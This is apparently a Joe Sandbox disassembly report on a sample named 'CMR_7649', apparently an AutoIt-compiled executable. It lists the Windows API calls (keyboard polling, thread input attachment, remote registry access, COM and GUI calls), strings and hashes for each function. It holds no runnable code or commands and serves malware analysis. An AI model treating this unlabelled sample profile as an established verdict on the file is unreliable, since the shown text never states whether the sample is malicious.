                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                • API String ID: 3054410614-2561132961
                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 600699880-22481851
                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: static
                                                • API String ID: 3375834691-2160076837
                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                • API String ID: 2907320926-3566645568
                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                • DeleteObject.GDI32(00540000), ref: 00470A04
                                                • DestroyIcon.USER32(006D0065), ref: 00470A1C
                                                • DeleteObject.GDI32(CA1E1A22), ref: 00470A34
                                                • DestroyWindow.USER32(00610044), ref: 00470A4C
                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                Similarity
                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 1237572874-0
                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                • String ID:
                                                • API String ID: 3413494760-0
                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                • String ID: AU3_FreeVar
                                                • API String ID: 2634073740-771828931
                                                • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                APIs
                                                • CoInitialize.OLE32 ref: 0046C63A
                                                • CoUninitialize.OLE32 ref: 0046C645
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 2294789929-1287834457
                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                APIs
                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                • ReleaseCapture.USER32 ref: 0047116F
                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 2483343779-2107944366
                                                • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                • _wcslen.LIBCMT ref: 00450720
                                                • _wcscat.LIBCMT ref: 00450733
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                • String ID: -----$SysListView32
                                                • API String ID: 4008455318-3975388722
                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                • GetParent.USER32 ref: 00469C98
                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                • GetParent.USER32 ref: 00469CBC
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 2360848162-1403004172
                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                • String ID:
                                                • API String ID: 262282135-0
                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                Similarity
                                                • API ID:
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 0-1603158881
                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                APIs
                                                • CreateMenu.USER32 ref: 00448603
                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                • IsMenu.USER32(?), ref: 004486AB
                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                • DrawMenuBar.USER32 ref: 004486F5
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0
                                                • API String ID: 161812096-4108050209
                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
